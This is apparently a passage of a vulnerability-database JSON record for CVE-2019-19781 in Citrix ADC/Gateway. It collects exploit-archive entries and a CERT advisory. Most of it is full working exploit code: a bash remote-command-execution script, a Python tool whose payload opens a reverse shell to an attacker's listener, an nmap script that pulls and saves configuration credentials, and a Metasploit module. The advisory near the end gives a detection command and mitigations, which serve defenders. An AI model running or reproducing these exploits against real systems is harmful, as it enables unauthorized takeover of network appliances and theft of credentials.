\nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "type": "packetstorm", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho \"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", "type": "packetstorm", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . \n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt"}], "ptsecurity": [{"lastseen": "2020-06-11T19:06:19", "bulletinFamily": "info", "description": "# PT-2020-01: Arbitrary code execution in Citrix ADC\n\nCitrix Application Delivery Controller (ADC) and Gateway\n\n**Severity:**\n\nSeverity level: High \nImpact: Arbitrary code execution in Citrix ADC \nAccess Vector: Remote\n\nCVSS v3 Base Score: 9.8 HIGH \nVector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\nCVE: CVE-2019-19781\n\n**Vulnerability description:**\n\nThis vulnerability allows an unauthorized, remote attacker to execute malicious code on the system, obtain unauthorized access to published applications, and attack intranet resources of the target organization via Citrix servers.\n\n**Advisory status:**\n\n05.12.2019 - Vendor gets vulnerability details 19.01.2020, 22.01.2020 23.01.2020, 24.01.2020 - Vendor releases fixed version and details\n\n**Credits:**\n\nThe vulnerability was discovered by Mikhail Klyuchnikov, Positive Technologies\n", "modified": "1970-01-01T00:00:00", "published": "2020-01-24T00:00:00", "id": "PT-2020-01", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2020-01/", "title": "PT-2020-01: Arbitrary code execution in Citrix ADC", "type": "ptsecurity", "cvss": {}}], "zdt": [{"lastseen": "2020-01-19T23:02:20", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "type": "zdt", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33824"}, {"lastseen": "2020-01-19T23:04:26", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33806"}, {"lastseen": "2020-01-19T23:06:56", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "type": "zdt", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33794"}], "cert": [{"lastseen": "2020-07-02T15:58:25", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability been [identified](<https://support.citrix.com/article/CTX267027>) in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC, Citrix Gateway formerly known as NetScaler Gateway, and Citrix SDWAN WANOP that could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nCitrix has published a [security bulletin](<https://support.citrix.com/article/CTX267027>) that mentions a vulnerability that can be exploited to achieve arbitrary code execution by a remote, unauthenticated attacker. Although the bulletin does not describe details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) describe techniques to block the handling of requests that contain a directory traversal attempt (`/../`) and also requests that attempt to access the `/vpns/` directory.\n\nLimited testing has shown that the affected Citrix software fails to restrict access to perl scripts that are available via the `/vpns/` path. An unauthenticated remote attacker may be able to provide crafted content to these scripts that result in arbitrary code execution. One technique that has been [outlined](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) involves the writing of an XML file using a directory traversal and the subsequent command execution by way of the [Perl Template Toolkit](<http://www.template-toolkit.org/>). Other exploitation techniques may be possible. \n \nA link of the following form can be used to determine if a system is affected: \n`https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf` \n \nFor example, the following curl command can be used: \n`curl https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf --path-as-is -k -f` \n \nThe \"` CITRIXGATEWAY `\" string should be replaced with the name or IP of the system you wish to test. If retrieving the link results in a 403 Forbidden error, then the mitigations outlined below have likely been applied. However, if retrieving the link results in the contents of a `smb.conf` file, then the system is vulnerable. \n \n--- \n \n### Impact \n\nBy exploiting this vulnerability, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCitrix has released updates in [Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>). The updated software is designed to prevent unauthenticated attackers from accessing certain web server features. If updates are unavailable for your platform, or if you are otherwise unable to apply updates, please consider the following workarounds: \n \n--- \n \n**Block the handling of specially-crafted requests** \n \nCitrix article [CTX267679](<https://support.citrix.com/article/CTX267679>) contains several mitigation options for this vulnerability, depending on what type of product installation is used. For example, on a stand-alone system, the following commands are reported to mitigate this vulnerability: \n\n\n`nable ns feature responder` \n`add responder action respondwith403 respondwith \"\\\"HTTP/1.1 403 Forbidden\\r\\\\r\\` \n`add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403` \n`bind responder global ctx267027 1 END -type REQ_OVERRIDE` \n`save config ` \n \n`shell nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0` \n`shell \"echo 'nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0' >> /nsconfig/rc.netscaler\"` \n`reboot` \nNote that other configurations, such as CLIP, and HA, the steps to mitigate this vulnerability may be different. Please see [CTX267679](<https://support.citrix.com/article/CTX267679>) for more details. \n \nAlso note that the above mitigation does not work on Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31, due to an altogether different bug. Release 12.1 users are recommended to update to an unaffected build and also apply mitigations for protection. \n--- \n \n### Vendor Information\n\n619785\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix Affected\n\nUpdated: January 08, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n * <https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>\n * <https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/>\n * <https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>\n * <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>\n * <https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>\n * 